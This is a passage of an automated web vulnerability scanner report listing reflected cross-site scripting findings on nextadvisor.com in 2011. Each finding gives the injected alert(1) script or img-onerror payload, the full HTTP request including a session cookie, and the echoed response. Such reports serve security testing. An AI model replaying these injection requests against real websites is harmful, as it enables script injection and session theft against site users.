Server: Apache/2.2.15 (Unix) mod_ssl/2.2.15 OpenSSL/0.9.7e PHP/5.3.2 mod_jk/1.2.21
X-Powered-By: PHP/5.3.2
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
P3P: CP="IDC DSP COR CURa ADMa OUR IND PHY ONL COM STA"
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 11905


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>


<meta http-equiv="Conten
...[SNIP]...
<link rel="canonical" href="http://www.nextadvisor.com/includes793b4"><script>alert(1)</script>a2d9ab8e691/javascript.php" />
...[SNIP]...

5.59. http://www.nextadvisor.com/includes/javascript.php [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.nextadvisor.com
Path:   /includes/javascript.php

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 9f7e3'><img%20src%3da%20onerror%3dalert(1)>9791e26f04a was submitted in the REST URL parameter 1. This input was echoed as 9f7e3'><img src=a onerror=alert(1)>9791e26f04a in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /includes9f7e3'><img%20src%3da%20onerror%3dalert(1)>9791e26f04a/javascript.php?script=http%3a%2f%2fsome-inexistent-website.acu%2fsome_inexistent_file_with_long_name HTTP/1.1
Host: www.nextadvisor.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=ca43057bfb377bbe8c129dafe1c6ec28; __utmz=252293142.1303613812.1.1.utmgclid=CJa0kuyTtKgCFQTe4AodlRiOCw|utmccn=(not%20set)|utmcmd=(not%20set); __utma=252293142.2039271104.1303613812.1303613812.1303613812.1; __utmc=252293142; __utmb=252293142.1.10.1303613812

Response

HTTP/1.1 404 Not Found
Date: Sun, 24 Apr 2011 04:10:22 GMT
Server: Apache/2.2.15 (Unix) mod_ssl/2.2.15 OpenSSL/0.9.7e PHP/5.3.2 mod_jk/1.2.21
X-Powered-By: PHP/5.3.2
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
P3P: CP="IDC DSP COR CURa ADMa OUR IND PHY ONL COM STA"
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 11944


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>


<meta http-equiv="Conten
...[SNIP]...
<a href='/includes9f7e3'><img src=a onerror=alert(1)>9791e26f04a/index.php' class='nav_select'>
...[SNIP]...

5.60. http://www.nextadvisor.com/includes/javascript.php [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.nextadvisor.com
Path:   /includes/javascript.php

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 88492"><script>alert(1)</script>7ca6639f3e5 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /includes/javascript.php88492"><script>alert(1)</script>7ca6639f3e5?script=http%3a%2f%2fsome-inexistent-website.acu%2fsome_inexistent_file_with_long_name HTTP/1.1
Host: www.nextadvisor.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=ca43057bfb377bbe8c129dafe1c6ec28; __utmz=252293142.1303613812.1.1.utmgclid=CJa0kuyTtKgCFQTe4AodlRiOCw|utmccn=(not%20set)|utmcmd=(not%20set); __utma=252293142.2039271104.1303613812.1303613812.1303613812.1; __utmc=252293142; __utmb=252293142.1.10.1303613812

Response

HTTP/1.1 404 Not Found
Date: Sun, 24 Apr 2011 04:11:02 GMT
Server: Apache/2.2.15 (Unix) mod_ssl/2.2.15 OpenSSL/0.9.7e PHP/5.3.2 mod_jk/1.2.21
X-Powered-By: PHP/5.3.2
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
P3P: CP="IDC DSP COR CURa ADMa OUR IND PHY ONL COM STA"
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 11925


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>


<meta http-equiv="Conten
...[SNIP]...
<link rel="canonical" href="http://www.nextadvisor.com/includes/javascript.php88492"><script>alert(1)</script>7ca6639f3e5" />
...[SNIP]...

5.61. http://www.nextadvisor.com/link.php [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.nextadvisor.com
Path:   /link.php

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1cce4"><script>alert(1)</script>1a534bed66f was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /link.php1cce4"><script>alert(1)</script>1a534bed66f?kw=gid9a%20identity%20theft%20resource_ordering34&category=identitytheft&link=idtheftshield&id=227 HTTP/1.1
Host: www.nextadvisor.com
Proxy-Connection: keep-alive
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=ca43057bfb377bbe8c129dafe1c6ec28; __utmz=252293142.1303613812.1.1.utmgclid=CJa0kuyTtKgCFQTe4AodlRiOCw|utmccn=(not%20set)|utmcmd=(not%20set); __utma=252293142.2039271104.1303613812.1303613812.1303613812.1; __utmc=252293142; __utmb=252293142.1.10.1303613812

Response

HTTP/1.1 404 Not Found
Date: Sun, 24 Apr 2011 03:27:19 GMT
Server: Apache/2.2.15 (Unix) mod_ssl/2.2.15 OpenSSL/0.9.7e PHP/5.3.2 mod_jk/1.2.21
X-Powered-By: PHP/5.3.2
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
P3P: CP="IDC DSP COR CURa ADMa OUR IND PHY ONL COM STA"
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 11904


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>


<meta http-equiv="Conten
...[SNIP]...
<link rel="canonical" href="http://www.nextadvisor.com/link.php1cce4"><script>alert(1)</script>1a534bed66f" />
...[SNIP]...

5.62. http://www.nextadvisor.com/pmid [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.nextadvisor.com
Path:   /pmid

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9ad9f"><script>alert(1)</script>0b406646753 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /pmid9ad9f"><script>alert(1)</script>0b406646753?kw=id%20gid9a%20identity%20theft%20resource_ordering34--2011-04-23--20-10-01CD1 HTTP/1.1
Host: www.nextadvisor.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=ca43057bfb377bbe8c129dafe1c6ec28; __utmz=252293142.1303613812.1.1.utmgclid=CJa0kuyTtKgCFQTe4AodlRiOCw|utmccn=(not%20set)|utmcmd=(not%20set); __utma=252293142.2039271104.1303613812.1303613812.1303613812.1; __utmc=252293142; __utmb=252293142.1.10.1303613812

Response

HTTP/1.1 404 Not Found
Date: Sun, 24 Apr 2011 03:32:18 GMT
Server: Apache/2.2.15 (Unix) mod_ssl/2.2.15 OpenSSL/0.9.7e PHP/5.3.2 mod_jk/1.2.21
X-Powered-By: PHP/5.3.2
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
P3P: CP="IDC DSP COR CURa ADMa OUR IND PHY ONL COM STA"
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 11896


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>


<meta http-equiv="Conten
...[SNIP]...
<link rel="canonical" href="http://www.nextadvisor.com/pmid9ad9f"><script>alert(1)</script>0b406646753" />
...[SNIP]...

5.63. http://www.nextadvisor.com/pmid [kw parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.nextadvisor.com
Path:   /pmid

Issue detail

The value of the kw request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 49117"><script>alert(1)</script>f1090dfeda0 was submitted in the kw parameter. This input was echoed as 49117\"><script>alert(1)</script>f1090dfeda0 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /pmid?kw=id%20gid9a%20identity%20theft%20resource_ordering34--2011-04-23--20-10-01CD149117"><script>alert(1)</script>f1090dfeda0 HTTP/1.1
Host: www.nextadvisor.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=ca43057bfb377bbe8c129dafe1c6ec28; __utmz=252293142.1303613812.1.1.utmgclid=CJa0kuyTtKgCFQTe4AodlRiOCw|utmccn=(not%20set)|utmcmd=(not%20set); __utma=252293142.2039271104.1303613812.1303613812.1303613812.1; __utmc=252293142; __utmb=252293142.1.10.1303613812

Response (redirected)

HTTP/1.1 200 OK
Date: Sun, 24 Apr 2011 03:24:41 GMT
Server: Apache/2.2.15 (Unix) mod_ssl/2.2.15 OpenSSL/0.9.7e PHP/5.3.2 mod_jk/1.2.21
X-Powered-By: PHP/5.3.2
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
P3P: CP="IDC DSP COR CURa ADMa OUR IND PHY ONL COM STA"
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 8853


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-
...[SNIP]...
<input type="hidden" name="bcd" value="id%20gid9a%20identity%20theft%20resource_ordering34--2011-04-23--20-10-01CD149117\"><script>alert(1)</script>f1090dfeda0">
...[SNIP]...

5.64. http://www.nextadvisor.com/pmid/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.nextadvisor.com
Path:   /pmid/

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 80329"><script>alert(1)</script>4aaae51729d was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /pmid80329"><script>alert(1)</script>4aaae51729d/?kw=id%2520gid9a%2520identity%2520theft%2520resource_ordering34--2011-04-23--20-10-01CD1 HTTP/1.1
Host: www.nextadvisor.com
Proxy-Connection: keep-alive
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=ca43057bfb377bbe8c129dafe1c6ec28; __utmz=252293142.1303613812.1.1.utmgclid=CJa0kuyTtKgCFQTe4AodlRiOCw|utmccn=(not%20set)|utmcmd=(not%20set); __utma=252293142.2039271104.1303613812.1303613812.1303613812.1; __utmc=252293142; __utmb=252293142.1.10.1303613812

Response

HTTP/1.1 404 Not Found
Date: Sun, 24 Apr 2011 03:18:49 GMT
Server: Apache/2.2.15 (Unix) mod_ssl/2.2.15 OpenSSL/0.9.7e PHP/5.3.2 mod_jk/1.2.21
X-Powered-By: PHP/5.3.2
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
P3P: CP="IDC DSP COR CURa ADMa OUR IND PHY ONL COM STA"
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 11887


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>


<meta http-equiv="Conten
...[SNIP]...
<link rel="canonical" href="http://www.nextadvisor.com/pmid80329"><script>alert(1)</script>4aaae51729d/" />
...[SNIP]...

5.65. http://www.nextadvisor.com/pmid/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.nextadvisor.com
Path:   /pmid/

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 9d626'><img%20src%3da%20onerror%3dalert(1)>287be27fca8 was submitted in the REST URL parameter 1. This input was echoed as 9d626'><img src=a onerror=alert(1)>287be27fca8 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /pmid9d626'><img%20src%3da%20onerror%3dalert(1)>287be27fca8/?kw=id%2520gid9a%2520identity%2520theft%2520resource_ordering34--2011-04-23--20-10-01CD1 HTTP/1.1
Host: www.nextadvisor.com
Proxy-Connection: keep-alive
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=ca43057bfb377bbe8c129dafe1c6ec28; __utmz=252293142.1303613812.1.1.utmgclid=CJa0kuyTtKgCFQTe4AodlRiOCw|utmccn=(not%20set)|utmcmd=(not%20set); __utma=252293142.2039271104.1303613812.1303613812.1303613812.1; __utmc=252293142; __utmb=252293142.1.10.1303613812

Response

HTTP/1.1 404 Not Found
Date: Sun, 24 Apr 2011 03:19:00 GMT
Server: Apache/2.2.15 (Unix) mod_ssl/2.2.15 OpenSSL/0.9.7e PHP/5.3.2 mod_jk/1.2.21
X-Powered-By: PHP/5.3.2
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
P3P: CP="IDC DSP COR CURa ADMa OUR IND PHY ONL COM STA"
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 11922


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>


<meta http-equiv="Conten
...[SNIP]...
<a href='/pmid9d626'><img src=a onerror=alert(1)>287be27fca8/index.php' class='nav_select'>
...[SNIP]...

5.66. http://www.nextadvisor.com/pmid/ [kw parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.nextadvisor.com
Path:   /pmid/

Issue detail

The value of the kw request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1f50a"><script>alert(1)</script>44a276d8c09 was submitted in the kw parameter. This input was echoed as 1f50a\"><script>alert(1)</script>44a276d8c09 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /pmid/?kw=id%2520gid9a%2520identity%2520theft%2520resource_ordering34--2011-04-23--20-10-01CD11f50a"><script>alert(1)</script>44a276d8c09 HTTP/1.1
Host: www.nextadvisor.com
Proxy-Connection: keep-alive
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=ca43057bfb377bbe8c129dafe1c6ec28; __utmz=252293142.1303613812.1.1.utmgclid=CJa0kuyTtKgCFQTe4AodlRiOCw|utmccn=(not%20set)|utmcmd=(not%20set); __utma=252293142.2039271104.1303613812.1303613812.1303613812.1; __utmc=252293142; __utmb=252293142.1.10.1303613812

Response

HTTP/1.1 200 OK
Date: Sun, 24 Apr 2011 03:14:02 GMT
Server: Apache/2.2.15 (Unix) mod_ssl/2.2.15 OpenSSL/0.9.7e PHP/5.3.2 mod_jk/1.2.21
X-Powered-By: PHP/5.3.2
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
P3P: CP="IDC DSP COR CURa ADMa OUR IND PHY ONL COM STA"
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 8853


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-
...[SNIP]...
<input type="hidden" name="bcd" value="id%20gid9a%20identity%20theft%20resource_ordering34--2011-04-23--20-10-01CD11f50a\"><script>alert(1)</script>44a276d8c09">
...[SNIP]...

5.67. http://www.nextadvisor.com/pmid/js/jquery.js [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.nextadvisor.com
Path:   /pmid/js/jquery.js

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 24a2c"><script>alert(1)</script>911df5ea084 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /pmid24a2c"><script>alert(1)</script>911df5ea084/js/jquery.js HTTP/1.1
Host: www.nextadvisor.com
Proxy-Connection: keep-alive
Referer: http://www.nextadvisor.com/pmid/?kw=id%2520gid9a%2520identity%2520theft%2520resource_ordering34--2011-04-23--20-10-01CD1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=ca43057bfb377bbe8c129dafe1c6ec28; __utmz=252293142.1303613812.1.1.utmgclid=CJa0kuyTtKgCFQTe4AodlRiOCw|utmccn=(not%20set)|utmcmd=(not%20set); __utma=252293142.2039271104.1303613812.1303613812.1303613812.1; __utmc=252293142; __utmb=252293142.1.10.1303613812

Response

HTTP/1.1 404 Not Found
Date: Sun, 24 Apr 2011 03:33:50 GMT
Server: Apache/2.2.15 (Unix) mod_ssl/2.2.15 OpenSSL/0.9.7e PHP/5.3.2 mod_jk/1.2.21
X-Powered-By: PHP/5.3.2
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
P3P: CP="IDC DSP COR CURa ADMa OUR IND PHY ONL COM STA"
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 11883


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>


<meta http-equiv="Conten
...[SNIP]...
<link rel="canonical" href="http://www.nextadvisor.com/pmid24a2c"><script>alert(1)</script>911df5ea084/js/jquery.js" />
...[SNIP]...

5.68. http://www.nextadvisor.com/pmid/js/jquery.js [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.nextadvisor.com
Path:   /pmid/js/jquery.js

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload f8df7'><img%20src%3da%20onerror%3dalert(1)>6cd5eb81ae0 was submitted in the REST URL parameter 2. This input was echoed as f8df7'><img src=a onerror=alert(1)>6cd5eb81ae0 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /pmid/jsf8df7'><img%20src%3da%20onerror%3dalert(1)>6cd5eb81ae0/jquery.js HTTP/1.1
Host: www.nextadvisor.com
Proxy-Connection: keep-alive
Referer: http://www.nextadvisor.com/pmid/?kw=id%2520gid9a%2520identity%2520theft%2520resource_ordering34--2011-04-23--20-10-01CD1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=ca43057bfb377bbe8c129dafe1c6ec28; __utmz=252293142.1303613812.1.1.utmgclid=CJa0kuyTtKgCFQTe4AodlRiOCw|utmccn=(not%20set)|utmcmd=(not%20set); __utma=252293142.2039271104.1303613812.1303613812.1303613812.1; __utmc=252293142; __utmb=252293142.1.10.1303613812

Response

HTTP/1.1 404 Not Found
Date: Sun, 24 Apr 2011 03:34:45 GMT
Server: Apache/2.2.15 (Unix) mod_ssl/2.2.15 OpenSSL/0.9.7e PHP/5.3.2 mod_jk/1.2.21
X-Powered-By: PHP/5.3.2
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
P3P: CP="IDC DSP COR CURa ADMa OUR IND PHY ONL COM STA"
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 11932


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>


<meta http-equiv="Conten
...[SNIP]...
<a href='/jsf8df7'><img src=a onerror=alert(1)>6cd5eb81ae0/index.php' class='nav_select'>
...[SNIP]...

5.69. http://www.nextadvisor.com/pmid/js/jquery.js [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.nextadvisor.com
Path:   /pmid/js/jquery.js

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload fec85"><script>alert(1)</script>1df6d9d92ab was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /pmid/jsfec85"><script>alert(1)</script>1df6d9d92ab/jquery.js HTTP/1.1
Host: www.nextadvisor.com
Proxy-Connection: keep-alive
Referer: http://www.nextadvisor.com/pmid/?kw=id%2520gid9a%2520identity%2520theft%2520resource_ordering34--2011-04-23--20-10-01CD1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=ca43057bfb377bbe8c129dafe1c6ec28; __utmz=252293142.1303613812.1.1.utmgclid=CJa0kuyTtKgCFQTe4AodlRiOCw|utmccn=(not%20set)|utmcmd=(not%20set); __utma=252293142.2039271104.1303613812.1303613812.1303613812.1; __utmc=252293142; __utmb=252293142.1.10.1303613812

Response

HTTP/1.1 404 Not Found
Date: Sun, 24 Apr 2011 03:34:33 GMT
Server: Apache/2.2.15 (Unix) mod_ssl/2.2.15 OpenSSL/0.9.7e PHP/5.3.2 mod_jk/1.2.21
X-Powered-By: PHP/5.3.2
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
P3P: CP="IDC DSP COR CURa ADMa OUR IND PHY ONL COM STA"
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 11899


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>


<meta http-equiv="Conten
...[SNIP]...
<link rel="canonical" href="http://www.nextadvisor.com/pmid/jsfec85"><script>alert(1)</script>1df6d9d92ab/jquery.js" />
...[SNIP]...

5.70. http://www.nextadvisor.com/pmid/js/jquery.js [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.nextadvisor.com
Path:   /pmid/js/jquery.js

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c828a"><script>alert(1)</script>d972e93d2be was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /pmid/js/jquery.jsc828a"><script>alert(1)</script>d972e93d2be HTTP/1.1
Host: www.nextadvisor.com
Proxy-Connection: keep-alive
Referer: http://www.nextadvisor.com/pmid/?kw=id%2520gid9a%2520identity%2520theft%2520resource_ordering34--2011-04-23--20-10-01CD1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=ca43057bfb377bbe8c129dafe1c6ec28; __utmz=252293142.1303613812.1.1.utmgclid=CJa0kuyTtKgCFQTe4AodlRiOCw|utmccn=(not%20set)|utmcmd=(not%20set); __utma=252293142.2039271104.1303613812.1303613812.1303613812.1; __utmc=252293142; __utmb=252293142.1.10.1303613812

Response

HTTP/1.1 404 Not Found
Date: Sun, 24 Apr 2011 03:35:25 GMT
Server: Apache/2.2.15 (Unix) mod_ssl/2.2.15 OpenSSL/0.9.7e PHP/5.3.2 mod_jk/1.2.21
X-Powered-By: PHP/5.3.2
